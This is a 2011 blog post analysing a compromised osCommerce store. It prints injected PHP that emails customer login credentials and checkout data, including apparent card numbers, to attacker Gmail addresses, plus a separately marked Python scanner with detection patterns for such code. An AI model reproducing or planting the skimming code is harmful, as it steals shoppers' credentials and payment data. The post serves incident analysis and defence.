File injection – login.php and checkout_confirmation.php
Here’s a couple of little code snippets that I found on an osC store I was working on.
login.php at line 23:
if (isset($HTTP_GET_VARS['action']) && ($HTTP_GET_VARS['action'] == 'process')) {
$email_address = tep_db_prepare_input($HTTP_POST_VARS['email_address']);
$password = tep_db_prepare_input($HTTP_POST_VARS['password']);
@mail("XXXXXXX@gmail.com","www.XXXXXXXX.com ","username : $email_address \n password : $password");
The last line above was added in by our old friend the hacker and simply emails a customer’s username and password to his throwaway email address at Googlemail.
Then in the file checkout_confirmation.php at around line 55 he’s also added in this:
$msgz = "";
if (!isset($_SERVER)) { $_SERVER = &$HTTP_SERVER_VARS; }
foreach ($_POST as $key => $value) { $msgz.=$key." => ".$value."\r\n"; }
foreach ($_GET as $key => $value) { $msgz.=$key." => ".$value."\r\n"; }
foreach ($order->info as $key => $value) { $msgz.=$key." => ".$value."\r\n"; }
foreach ($order->customer as $key => $value) { $msgz.=$key." => ".$value."\r\n"; }
foreach ($order->customer['country'] as $key => $value) { $msgz.="country-".$key." => ".$value."\r\n"; }
$msgz .= $_SERVER['HTTP_REFERER']."\r\n".$_SERVER['SCRIPT_FILENAME'];
if(preg_match('/[0-9]{12,19}|paypal/i',$msgz)) {
@mail('XXXXX@gmail.com','setoran',$msgz);
} else {
@mail('YYYYYYY@gmail.com','setoran',$msgz);
}
This baby catches all the information being passed from the checkout_confirmation.php page to the checkout_process.php file and emails it to one or other of his email addresses, depending on whether the captured text contains a 12 to 19 digit number or the word "paypal".
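A defender's check for this pattern, as an added example that is not code from the original post: a Python scanner that flags the indicators visible in the two snippets above (error-suppressed `mail()` calls, hard-coded recipients, password variables passed to `mail()`, loops that dump request arrays, and a card-number regex). The rule names, `scan_php` and the sample input are constructed for illustration.

```python
import re

# Heuristic rules derived from the two injected snippets shown above.
# Rule names are hypothetical labels chosen for this example.
RULES = {
    "suppressed-mail": re.compile(r"@\s*mail\s*\("),
    "hardcoded-recipient": re.compile(r"""\bmail\s*\(\s*['"][^'"]*@[^'"]+['"]"""),
    "credential-in-mail": re.compile(r"\bmail\s*\(.*\$\w*pass\w*", re.I),
    "request-dump": re.compile(
        r"foreach\s*\(\s*\$(_POST|_GET|_REQUEST|HTTP_POST_VARS|HTTP_GET_VARS)\b"),
    "card-number-regex": re.compile(r"\[0-9\]\{1\d,\s*1\d\}"),
}

def scan_php(source):
    """Return a list of (line_number, sorted rule names) for suspicious lines."""
    findings = []
    for number, line in enumerate(source.splitlines(), start=1):
        hits = sorted(name for name, rx in RULES.items() if rx.search(line))
        if hits:
            findings.append((number, hits))
    return findings

# Constructed sample: mirrors the injected lines above, with a placeholder
# address, plus one legitimate tep_mail() call that must not be flagged.
SAMPLE = r'''<?php
$password = tep_db_prepare_input($HTTP_POST_VARS['password']);
@mail("attacker@example.invalid","shop","username : $email_address \n password : $password");
tep_mail($name, $email_address, EMAIL_SUBJECT, $email_text, STORE_OWNER, STORE_OWNER_EMAIL_ADDRESS);
foreach ($_POST as $key => $value) { $msgz.=$key." => ".$value."\r\n"; }
if(preg_match('/[0-9]{12,19}|paypal/i',$msgz)) {
@mail('attacker@example.invalid','x',$msgz);
}
'''

if __name__ == "__main__":
    for number, hits in scan_php(SAMPLE):
        print(f"line {number}: {', '.join(hits)}")
```

Heuristics like these will also match some legitimate code, so treat hits as leads to review; comparing the store's files against a known-good copy is the more reliable check.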
This entry was posted by Graeme on January 22, 2011 at 12:09 pm, and is filed under Security.

